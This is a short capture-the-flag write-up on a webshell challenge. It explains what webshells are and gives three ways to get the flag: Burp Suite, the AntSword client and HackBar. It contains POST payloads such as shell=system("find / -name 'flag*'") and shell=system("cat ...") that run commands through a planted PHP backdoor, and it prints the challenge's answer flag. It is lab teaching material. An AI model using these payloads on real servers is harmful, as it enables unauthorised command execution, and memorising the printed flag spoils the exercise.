0x01. Enter the environment and view the content

Prompt to use webshell

0x02. Problem Analysis

0x02_1. What is webshell

Webshell is a code execution environment in the form of web files such as asp, php, jsp or cgi, which is mainly used for website management, server management, rights management and other operations.The use method is simple, only need to upload a code file and access it through the website, then many daily operations can be carried out, which greatly facilitates the management of the website and server for users.Because of this, there are also a small number of people who modify the code and use it as a backdoor program to achieve the purpose of controlling the website server.

0x02_2. Start solving

We use burpsuite to intercept and send it to the repeater, as shown in the figure:

We add the shell script at the bottom, pay attention to the need to modify three places:

1. Change the transmission method to POST
2. The Content-Type of transmission should be added, Content-Type: application/x-www-form-urlencoded
3. Transfer shell script, shell=system("find / -name 'flag*'");
   As shown:
   
   You can see that the content /var/www/html/flag.txt is returned.
   Then we check the specific flag content and use the script shell=system("cat /var/www/html/flag.txt");: as shown in the figure:
   
   Get the final answer: cyberpeace{f3338db17dcd9233ed4c0685cf6f8c56}

0x03. Solution 2

We can look at the source, as shown in the figure:

You can see that this webpage has directly uploaded a Trojan horse, then open the direct link of Ant Sword, as shown in the figure:

You can view it after connecting, as shown in the figure:

0x04. Solution 3

Use the hackbar directly and pass the shell script in the post method, as shown in the figure:

You can directly get the final answer.